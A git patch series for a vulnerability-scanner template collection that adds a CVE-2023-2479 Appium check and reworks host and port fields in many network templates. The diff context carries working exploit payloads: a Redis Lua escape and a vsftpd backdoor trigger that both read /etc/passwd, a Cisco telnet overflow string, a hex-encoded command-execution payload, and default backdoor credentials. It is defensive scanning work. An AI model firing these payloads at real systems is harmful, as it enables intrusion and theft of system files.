From a711c0cc04c1900a18b86ee0538d6d5f9917f75b Mon Sep 17 00:00:00 2001 From: zn9988 Date: Fri, 15 Sep 2023 15:11:13 +0800 Subject: [PATCH 01/23] Create CVE-2023-2479.yaml --- http/cves/2023/CVE-2023-2479.yaml | 53 +++++++++++++++++++++++++++++++ 1 file changed, 53 insertions(+) create mode 100644 http/cves/2023/CVE-2023-2479.yaml diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml new file mode 100644 index 0000000000..54d902d607 --- /dev/null +++ b/http/cves/2023/CVE-2023-2479.yaml @@ -0,0 +1,53 @@ +id: CVE-2023-2479 + +info: + name: Zero Click Remote Code Execution on Appium Desktop Server + author: zn9988, Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com) + severity: Critical + description: Appium Desktop Server is susceptible to an unauthenticated remote code execution vulnerability. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-2479 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-2479 + - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/ + tags: http,rce,dast,oast,cve,electron + +requests: + - method: GET + path: + - '{{BaseURL}}/?url=' + + matchers-condition: and + matchers: + # Response String + - type: word + part: body + words: + - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource" + + # Status Code + - type: status + status: + - 404 + + # Content Type + - type: word + part: header + words: + - "application/json" + + # Response Header + - type: word + part: header + words: + - "X-Powered-By: Express" + + # Captured the interact callbacks + - type: word + part: interactsh_protocol + condition: or + words: + - "dns" + - "http" From 29133d5978d3be6872f56fa33a6e734c876716b9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Sun, 17 Sep 2023 01:05:21 +0530 Subject: [PATCH 02/23] removed duplicate network request --- network/backdoor/backdoored-zte.yaml | 3 +-- network/backdoor/vsftpd-backdoor.yaml | 3 +-- network/cves/2001/CVE-2001-1473.yaml | 2 +- network/cves/2011/CVE-2011-2523.yaml | 3 ++- network/cves/2015/CVE-2015-3306.yaml | 2 +- network/cves/2016/CVE-2016-2004.yaml | 2 +- network/cves/2016/CVE-2016-3510.yaml | 2 +- network/cves/2017/CVE-2017-3881.yaml | 2 +- network/cves/2017/CVE-2017-5645.yaml | 2 +- network/cves/2018/CVE-2018-2893.yaml | 2 +- network/cves/2020/CVE-2020-11981.yaml | 2 +- network/cves/2020/CVE-2020-1938.yaml | 5 ++--- network/cves/2020/CVE-2020-7247.yaml | 3 ++- network/cves/2021/CVE-2021-44521.yaml | 3 ++- network/cves/2022/CVE-2022-0543.yaml | 5 ++--- network/cves/2022/CVE-2022-24706.yaml | 3 ++- network/cves/2023/CVE-2023-33246.yaml | 3 ++- network/default-login/ftp-anonymous-login.yaml | 2 +- network/default-login/ftp-weak-credentials.yaml | 2 +- network/default-login/ldap-anonymous-login.yaml | 2 +- network/detection/activemq-openwire-transport-detect.yaml | 2 +- network/detection/apache-activemq-detect.yaml | 2 +- network/detection/axigen-mail-server-detect.yaml | 2 +- network/detection/cisco-finger-detect.yaml | 2 +- network/detection/clamav-detect.yaml | 2 +- network/detection/cql-native-transport.yaml | 2 +- network/detection/detect-addpac-voip-gateway.yaml | 2 +- network/detection/detect-jabber-xmpp.yaml | 2 +- network/detection/dotnet-remoting-service-detect.yaml | 2 +- network/detection/dropbear-cbc-ciphers.yaml | 2 +- network/detection/esmtp-detect.yaml | 2 +- network/detection/expn-mail-detect.yaml | 2 +- network/detection/finger-detect.yaml | 2 +- network/detection/gnu-inetutils-ftpd-detect.yaml | 3 +-- network/detection/gopher-detect.yaml | 2 +- network/detection/ibm-d2b-database-server.yaml | 2 +- network/detection/imap-detect.yaml | 2 +- network/detection/iplanet-imap-detect.yaml | 2 +- network/detection/microsoft-ftp-service.yaml | 2 +- network/detection/mikrotik-ftp-server-detect.yaml | 2 +- network/detection/mikrotik-routeros-api.yaml | 2 +- network/detection/mongodb-detect.yaml | 2 +- network/detection/msmq-detect.yaml | 3 +-- network/detection/mysql-detect.yaml | 2 +- network/detection/openssh-detect.yaml | 2 +- network/detection/pgsql-detect.yaml | 2 +- network/detection/pop3-detect.yaml | 2 +- network/detection/proftpd-server-detect.yaml | 2 +- network/detection/rabbitmq-detect.yaml | 2 +- network/detection/rdp-detect.yaml | 2 +- network/detection/redis-detect.yaml | 6 ++---- network/detection/riak-detect.yaml | 2 +- network/detection/rpcbind-portmapper-detect.yaml | 2 +- network/detection/rsyncd-service-detect.yaml | 2 +- network/detection/rtsp-detect.yaml | 2 +- network/detection/samba-detect.yaml | 3 +-- network/detection/sap-router.yaml | 2 +- network/detection/smb-detect.yaml | 2 +- network/detection/smtp-detect.yaml | 3 ++- network/detection/sshd-dropbear-detect.yaml | 2 +- network/detection/starttls-mail-detect.yaml | 2 +- network/detection/teamspeak3-detect.yaml | 2 +- network/detection/telnet-detect.yaml | 2 +- network/detection/totemomail-smtp-detect.yaml | 2 +- network/detection/vmware-authentication-daemon-detect.yaml | 2 +- network/detection/vnc-service-detect.yaml | 2 +- network/detection/xlight-ftp-service-detect.yaml | 2 +- network/enumeration/beanstalk-service.yaml | 3 ++- network/enumeration/kafka-topics-list.yaml | 3 ++- network/enumeration/mongodb-info-enum.yaml | 2 +- network/enumeration/niagara-fox-info-enum.yaml | 2 +- network/enumeration/psql-user-enum.yaml | 2 +- network/enumeration/smtp-commands-enum.yaml | 2 +- network/enumeration/smtp/smtp-user-enum.yaml | 2 +- network/exposures/cisco-smi-exposure.yaml | 2 +- network/exposures/exposed-adb.yaml | 2 +- network/exposures/exposed-dockerd.yaml | 2 +- network/exposures/exposed-redis.yaml | 4 +--- network/exposures/exposed-zookeeper.yaml | 2 +- network/misconfig/apache-dubbo-unauth.yaml | 2 +- network/misconfig/apache-rocketmq-broker-unauth.yaml | 2 +- network/misconfig/clamav-unauth.yaml | 2 +- network/misconfig/clickhouse-unauth.yaml | 2 +- network/misconfig/dropbear-weakalgo.yaml | 2 +- network/misconfig/dropbear-weakmac.yaml | 2 +- network/misconfig/ganglia-xml-grid-monitor.yaml | 2 +- network/misconfig/memcached-stats.yaml | 2 +- network/misconfig/mongodb-unauth.yaml | 3 ++- network/misconfig/mysql-native-password.yaml | 2 +- network/misconfig/printers-info-leak.yaml | 4 +++- network/misconfig/sap-router-info-leak.yaml | 2 +- network/misconfig/tidb-native-password.yaml | 2 +- network/misconfig/tidb-unauth.yaml | 2 +- network/misconfig/unauth-psql.yaml | 2 +- network/vulnerabilities/clockwatch-enterprise-rce.yaml | 2 +- 95 files changed, 109 insertions(+), 109 deletions(-) diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml index 699a27b60b..d9ffb84282 100644 --- a/network/backdoor/backdoored-zte.yaml +++ b/network/backdoor/backdoored-zte.yaml @@ -21,8 +21,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:23" - + port: 23 inputs: - data: "root\r\n" - data: "Zte521\r\n\r\n" diff --git a/network/backdoor/vsftpd-backdoor.yaml b/network/backdoor/vsftpd-backdoor.yaml index e8195a5bff..764d4921c5 100644 --- a/network/backdoor/vsftpd-backdoor.yaml +++ b/network/backdoor/vsftpd-backdoor.yaml @@ -21,9 +21,8 @@ tcp: - data: "USER anonymous\r\nPASS anonymous\r\n" host: - - "{{Host}}:21" - "{{Hostname}}" - + port: 21 matchers: - type: word words: diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index eceb3e855e..62af220d3f 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -26,7 +26,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word words: diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index a1c22ab8ce..4e5159ea65 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -32,7 +32,8 @@ variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs tcp: - host: - - "{{Host}}:21" + - "{{Hostname}}" + port: 21 inputs: - data: "USER letmein:)\r\nPASS please\r\n" read: 100 diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index fe810d10ef..8a97fba2e3 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -27,7 +27,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 inputs: - data: "site cpfr /proc/self/cmdline\r\n" read: 1024 diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index cf73fce93f..4b21aaedbf 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -28,7 +28,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:5555" + port: 5555 inputs: - data: "00000034320001010101010100010001000100010100203238005c7065726c2e65786500202d6573797374656d282777686f616d69272900" # whoami type: hex diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 6766b764df..e8ed87a996 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -33,7 +33,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:7001" + port: 7001 read-size: 4 matchers: diff --git a/network/cves/2017/CVE-2017-3881.yaml b/network/cves/2017/CVE-2017-3881.yaml index 1c75e515f5..b0515d8c77 100644 --- a/network/cves/2017/CVE-2017-3881.yaml +++ b/network/cves/2017/CVE-2017-3881.yaml @@ -28,7 +28,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:23" + port: 22 inputs: - data: "{{hex_decode('fffa240003')}}CISCO_KITS{{hex_decode('01')}}2:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA{{hex_decode('000037b4023d55dc0000999c')}}BBBB{{hex_decode('00e1a9f4')}}CCCCDDDDEEEE{{hex_decode('00067b5c023d55c8')}}FFFFGGGG{{hex_decode('006cb3a000270b94')}}HHHHIIII{{hex_decode('014acf98')}}JJJJKKKKLLLL{{hex_decode('0114e7ec')}}:15:{{hex_decode('fff0')}}" read: 1024 diff --git a/network/cves/2017/CVE-2017-5645.yaml b/network/cves/2017/CVE-2017-5645.yaml index 120bcc3720..7ef472e9aa 100644 --- a/network/cves/2017/CVE-2017-5645.yaml +++ b/network/cves/2017/CVE-2017-5645.yaml @@ -31,7 +31,7 @@ variables: tcp: - host: - "{{Hostname}}" - - "{{Host}}:4712" + port: 4712 inputs: - data: "{{generate_java_gadget('dns', 'http://{{interactsh-url}}', 'hex')+concat(end)}}" read-size: 100 diff --git a/network/cves/2018/CVE-2018-2893.yaml b/network/cves/2018/CVE-2018-2893.yaml index 77cd966683..40da5cb75e 100644 --- a/network/cves/2018/CVE-2018-2893.yaml +++ b/network/cves/2018/CVE-2018-2893.yaml @@ -38,7 +38,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:7001" + port: 7001 matchers: - type: word diff --git a/network/cves/2020/CVE-2020-11981.yaml b/network/cves/2020/CVE-2020-11981.yaml index 9144c138b2..d5951f7dc7 100644 --- a/network/cves/2020/CVE-2020-11981.yaml +++ b/network/cves/2020/CVE-2020-11981.yaml @@ -34,7 +34,7 @@ tcp: read: 1024 host: - "{{Hostname}}" - - "{{Host}}:6379" + port: 6379 matchers-condition: and matchers: diff --git a/network/cves/2020/CVE-2020-1938.yaml b/network/cves/2020/CVE-2020-1938.yaml index 045b9a321a..16130426c3 100644 --- a/network/cves/2020/CVE-2020-1938.yaml +++ b/network/cves/2020/CVE-2020-1938.yaml @@ -28,9 +28,8 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Hostname}}" - - "{{Host}}:8009" - - "{{Host}}:8009" + port: 8009 + inputs: - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}" read-size: 1024 diff --git a/network/cves/2020/CVE-2020-7247.yaml b/network/cves/2020/CVE-2020-7247.yaml index 96bff3c7f6..a74985f436 100644 --- a/network/cves/2020/CVE-2020-7247.yaml +++ b/network/cves/2020/CVE-2020-7247.yaml @@ -28,7 +28,8 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 + inputs: - read: 1024 diff --git a/network/cves/2021/CVE-2021-44521.yaml b/network/cves/2021/CVE-2021-44521.yaml index 6bdae518ae..5b017f6a77 100644 --- a/network/cves/2021/CVE-2021-44521.yaml +++ b/network/cves/2021/CVE-2021-44521.yaml @@ -28,7 +28,8 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:9042" + port: 9042 + inputs: - data: "050000000500000000" type: hex diff --git a/network/cves/2022/CVE-2022-0543.yaml b/network/cves/2022/CVE-2022-0543.yaml index 96b18d66b1..ebe5b94ebb 100644 --- a/network/cves/2022/CVE-2022-0543.yaml +++ b/network/cves/2022/CVE-2022-0543.yaml @@ -30,10 +30,9 @@ info: tags: cve,cve2022,network,redis,unauth,rce,kev tcp: - host: - - "{{Hostname}}" - - "{{Host}}:6379" - "tls://{Hostname}}" - - "tls://{{Host}}:6380" + port: 6380 + inputs: - data: "eval 'local io_l = package.loadlib(\"/usr/lib/x86_64-linux-gnu/liblua5.1.so.0\", \"luaopen_io\"); local io = io_l(); local f = io.popen(\"cat /etc/passwd\", \"r\"); local res = f:read(\"*a\"); f:close(); return res' 0\r\n" read-size: 64 diff --git a/network/cves/2022/CVE-2022-24706.yaml b/network/cves/2022/CVE-2022-24706.yaml index 7d05c564ec..583f7ac40b 100644 --- a/network/cves/2022/CVE-2022-24706.yaml +++ b/network/cves/2022/CVE-2022-24706.yaml @@ -36,7 +36,8 @@ variables: tcp: - host: - "{{Hostname}}" - - "{{Host}}:9100" + port: 9100 + inputs: # auth - data: "{{name_msg}}" diff --git a/network/cves/2023/CVE-2023-33246.yaml b/network/cves/2023/CVE-2023-33246.yaml index 51c2a56a98..babe5d2f4c 100644 --- a/network/cves/2023/CVE-2023-33246.yaml +++ b/network/cves/2023/CVE-2023-33246.yaml @@ -34,7 +34,8 @@ variables: tcp: - host: - "{{Hostname}}" - - "{{Host}}:10911" + port: 10911 + inputs: - data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}' read: 1024 diff --git a/network/default-login/ftp-anonymous-login.yaml b/network/default-login/ftp-anonymous-login.yaml index 3c210d02b5..552eb7830a 100644 --- a/network/default-login/ftp-anonymous-login.yaml +++ b/network/default-login/ftp-anonymous-login.yaml @@ -20,8 +20,8 @@ tcp: read: 1024 host: - - "{{Host}}:21" - "{{Hostname}}" + port: 21 matchers-condition: and matchers: diff --git a/network/default-login/ftp-weak-credentials.yaml b/network/default-login/ftp-weak-credentials.yaml index 696970bf22..06181d3b73 100644 --- a/network/default-login/ftp-weak-credentials.yaml +++ b/network/default-login/ftp-weak-credentials.yaml @@ -21,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 attack: clusterbomb payloads: diff --git a/network/default-login/ldap-anonymous-login.yaml b/network/default-login/ldap-anonymous-login.yaml index aae1a43689..c6ed3c04da 100644 --- a/network/default-login/ldap-anonymous-login.yaml +++ b/network/default-login/ldap-anonymous-login.yaml @@ -24,7 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:389" + port: 389 read-size: 1024 matchers: diff --git a/network/detection/activemq-openwire-transport-detect.yaml b/network/detection/activemq-openwire-transport-detect.yaml index 1930969a7e..9e1b3c9164 100644 --- a/network/detection/activemq-openwire-transport-detect.yaml +++ b/network/detection/activemq-openwire-transport-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:61616" + port: 61616 matchers-condition: and matchers: diff --git a/network/detection/apache-activemq-detect.yaml b/network/detection/apache-activemq-detect.yaml index e927ea96bf..0d8842fd91 100644 --- a/network/detection/apache-activemq-detect.yaml +++ b/network/detection/apache-activemq-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:61613" + port: 61613 matchers-condition: and matchers: diff --git a/network/detection/axigen-mail-server-detect.yaml b/network/detection/axigen-mail-server-detect.yaml index 8b6bc4df23..5de2d9d507 100644 --- a/network/detection/axigen-mail-server-detect.yaml +++ b/network/detection/axigen-mail-server-detect.yaml @@ -19,7 +19,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/cisco-finger-detect.yaml b/network/detection/cisco-finger-detect.yaml index 64366b18e5..72d1eeea38 100644 --- a/network/detection/cisco-finger-detect.yaml +++ b/network/detection/cisco-finger-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:79" + port: 79 matchers: - type: word diff --git a/network/detection/clamav-detect.yaml b/network/detection/clamav-detect.yaml index bdf57c43b8..d310c515cf 100644 --- a/network/detection/clamav-detect.yaml +++ b/network/detection/clamav-detect.yaml @@ -17,7 +17,7 @@ tcp: - data: "VERSION" host: - "{{Hostname}}" - - "{{Host}}:3310" + port: 3310 matchers: - type: regex diff --git a/network/detection/cql-native-transport.yaml b/network/detection/cql-native-transport.yaml index 0da40bade4..cf8cab548e 100644 --- a/network/detection/cql-native-transport.yaml +++ b/network/detection/cql-native-transport.yaml @@ -25,7 +25,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:9042" + port: 9042 matchers: - type: word diff --git a/network/detection/detect-addpac-voip-gateway.yaml b/network/detection/detect-addpac-voip-gateway.yaml index a74286909d..59bb244d24 100644 --- a/network/detection/detect-addpac-voip-gateway.yaml +++ b/network/detection/detect-addpac-voip-gateway.yaml @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:23" + port: 23 matchers: - type: word diff --git a/network/detection/detect-jabber-xmpp.yaml b/network/detection/detect-jabber-xmpp.yaml index 42639efe65..5dbc697df4 100644 --- a/network/detection/detect-jabber-xmpp.yaml +++ b/network/detection/detect-jabber-xmpp.yaml @@ -21,7 +21,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5222" + port: 5222 matchers: - type: word diff --git a/network/detection/dotnet-remoting-service-detect.yaml b/network/detection/dotnet-remoting-service-detect.yaml index 0e6810cbba..eecbbf3434 100644 --- a/network/detection/dotnet-remoting-service-detect.yaml +++ b/network/detection/dotnet-remoting-service-detect.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8080" + port: 8080 matchers-condition: and matchers: diff --git a/network/detection/dropbear-cbc-ciphers.yaml b/network/detection/dropbear-cbc-ciphers.yaml index c361c0f2d1..87bfc728d5 100644 --- a/network/detection/dropbear-cbc-ciphers.yaml +++ b/network/detection/dropbear-cbc-ciphers.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: word diff --git a/network/detection/esmtp-detect.yaml b/network/detection/esmtp-detect.yaml index 72b2dab40c..2aecc3c599 100644 --- a/network/detection/esmtp-detect.yaml +++ b/network/detection/esmtp-detect.yaml @@ -24,7 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers-condition: and matchers: diff --git a/network/detection/expn-mail-detect.yaml b/network/detection/expn-mail-detect.yaml index 6b1525f20b..4408acfc97 100644 --- a/network/detection/expn-mail-detect.yaml +++ b/network/detection/expn-mail-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:25" + port: 25 matchers: - type: word diff --git a/network/detection/finger-detect.yaml b/network/detection/finger-detect.yaml index 0080ce646e..80a548d404 100644 --- a/network/detection/finger-detect.yaml +++ b/network/detection/finger-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:79" + port: 79 matchers: - type: word diff --git a/network/detection/gnu-inetutils-ftpd-detect.yaml b/network/detection/gnu-inetutils-ftpd-detect.yaml index 7731e2db8a..85460f07dc 100644 --- a/network/detection/gnu-inetutils-ftpd-detect.yaml +++ b/network/detection/gnu-inetutils-ftpd-detect.yaml @@ -17,8 +17,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" - + port: 21 matchers: - type: word words: diff --git a/network/detection/gopher-detect.yaml b/network/detection/gopher-detect.yaml index d2d8621175..3d1ee9fdcb 100644 --- a/network/detection/gopher-detect.yaml +++ b/network/detection/gopher-detect.yaml @@ -19,7 +19,7 @@ tcp: - data: "\r\n" host: - "{{Hostname}}" - - "{{Host}}:70" + port: 70 matchers: - type: dsl diff --git a/network/detection/ibm-d2b-database-server.yaml b/network/detection/ibm-d2b-database-server.yaml index 868d874ac2..c6a68dcb83 100644 --- a/network/detection/ibm-d2b-database-server.yaml +++ b/network/detection/ibm-d2b-database-server.yaml @@ -25,7 +25,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:50000" + port: 50000 matchers-condition: and matchers: diff --git a/network/detection/imap-detect.yaml b/network/detection/imap-detect.yaml index d3285206ca..c976843061 100644 --- a/network/detection/imap-detect.yaml +++ b/network/detection/imap-detect.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:143" + port: 143 matchers-condition: and matchers: diff --git a/network/detection/iplanet-imap-detect.yaml b/network/detection/iplanet-imap-detect.yaml index d0c95983ae..60bc7b1b86 100644 --- a/network/detection/iplanet-imap-detect.yaml +++ b/network/detection/iplanet-imap-detect.yaml @@ -20,7 +20,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:110" + port: 110 matchers: - type: word diff --git a/network/detection/microsoft-ftp-service.yaml b/network/detection/microsoft-ftp-service.yaml index ba87bbdfad..b0cc34b288 100644 --- a/network/detection/microsoft-ftp-service.yaml +++ b/network/detection/microsoft-ftp-service.yaml @@ -18,7 +18,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word diff --git a/network/detection/mikrotik-ftp-server-detect.yaml b/network/detection/mikrotik-ftp-server-detect.yaml index 6c54ea1f55..32fdf0196f 100644 --- a/network/detection/mikrotik-ftp-server-detect.yaml +++ b/network/detection/mikrotik-ftp-server-detect.yaml @@ -17,7 +17,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word diff --git a/network/detection/mikrotik-routeros-api.yaml b/network/detection/mikrotik-routeros-api.yaml index 73c3ccdfee..8bc12b6619 100644 --- a/network/detection/mikrotik-routeros-api.yaml +++ b/network/detection/mikrotik-routeros-api.yaml @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8728" + port: 8728 matchers: - type: word diff --git a/network/detection/mongodb-detect.yaml b/network/detection/mongodb-detect.yaml index 731a52674c..767acb5329 100644 --- a/network/detection/mongodb-detect.yaml +++ b/network/detection/mongodb-detect.yaml @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:27017" + port: 27017 read-size: 2048 matchers: diff --git a/network/detection/msmq-detect.yaml b/network/detection/msmq-detect.yaml index 619301c3cb..c5f820607d 100644 --- a/network/detection/msmq-detect.yaml +++ b/network/detection/msmq-detect.yaml @@ -24,8 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:1801" - + port: 1801 read-size: 2048 matchers: diff --git a/network/detection/mysql-detect.yaml b/network/detection/mysql-detect.yaml index f30568179c..f7e5ee3c42 100644 --- a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:3306" + port: 3306 matchers: - type: word diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml index 68cd4ad687..b2247e0ca9 100644 --- a/network/detection/openssh-detect.yaml +++ b/network/detection/openssh-detect.yaml @@ -23,7 +23,7 @@ info: tcp: - host: - "{{Hostname}}" - - "{{Host}}:22" + port: 22 matchers: - type: regex diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index 28cd603ce5..aa2eac58ee 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -28,7 +28,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5432" + port: 5432 read-size: 2048 matchers-condition: and diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index d38ba3ffc8..e0188625a5 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml @@ -24,7 +24,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:110" + port: 110 matchers: - type: word diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml index df5df5d2da..f00fcb785d 100644 --- a/network/detection/proftpd-server-detect.yaml +++ b/network/detection/proftpd-server-detect.yaml @@ -17,7 +17,7 @@ tcp: - data: "\n" host: - "{{Hostname}}" - - "{{Host}}:21" + port: 21 matchers: - type: word diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml index 8ccf9cecaa..d30db181a7 100644 --- a/network/detection/rabbitmq-detect.yaml +++ b/network/detection/rabbitmq-detect.yaml @@ -20,7 +20,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:5672" + port: 5672 matchers-condition: and matchers: diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml index 21a817a040..0d76f3cf69 100644 --- a/network/detection/rdp-detect.yaml +++ b/network/detection/rdp-detect.yaml @@ -22,8 +22,8 @@ tcp: read-size: 2048 host: - - "{{Host}}:3389" - "{{Hostname}}" + port: 3389 matchers: - type: word diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index 9f1431ef6a..a10cd201cf 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -19,10 +19,8 @@ tcp: - data: "*1\r\n$4\r\ninfo\r\n" host: - - "{{Hostname}}" - - "{{Host}}:6379" - - "tls://{Hostname}}" - - "tls://{{Host}}:6380" + - "tls://{{Host}}" + port: 6380 read-size: 1024 matchers: diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml index e52868d902..e065574dab 100644 --- a/network/detection/riak-detect.yaml +++ b/network/detection/riak-detect.yaml @@ -18,7 +18,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:8087" + port: 8087 read-size: 2048 matchers: diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml index d8fa9166c5..c5e1a28a2a 100644 --- a/network/detection/rpcbind-portmapper-detect.yaml +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -23,7 +23,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:111" + port: 111 matchers: - type: word diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml index cf8d848e1a..fb9513e98a 100644 --- a/network/detection/rsyncd-service-detect.yaml +++ b/network/detection/rsyncd-service-detect.yaml @@ -22,7 +22,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:873" + port: 873 matchers: - type: word diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml index b9beed2b9d..43914dcbfe 100644 --- a/network/detection/rtsp-detect.yaml +++ b/network/detection/rtsp-detect.yaml @@ -25,7 +25,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:554" + port: 554 read-size: 1024 matchers: diff --git a/network/detection/samba-detect.yaml b/network/detection/samba-detect.yaml index cc20db7a91..7af60e0236 100644 --- a/network/detection/samba-detect.yaml +++ b/network/detection/samba-detect.yaml @@ -21,8 +21,7 @@ tcp: type: hex host: - "{{Hostname}}" - - "{{Host}}:139" - + port: 139 matchers-condition: and matchers: - type: word diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml index b7cf6ff735..63aa87a552 100644 --- a/network/detection/sap-router.yaml +++ b/network/detection/sap-router.yaml @@ -17,7 +17,7 @@ tcp: host: - "{{Hostname}}" - - "{{Host}}:3299" + port: 3299 read-size: 1024 matchers: diff --git a/network/detection/smb-detect.yaml b/network/detection/smb-detect.yaml index 038dc22d2e..3d9c2982a6 100644 --- a/network/detection/smb-detect.yaml +++ b/network/detection/smb-detect.yaml @@ -17,7 +17,7 @@ tcp: 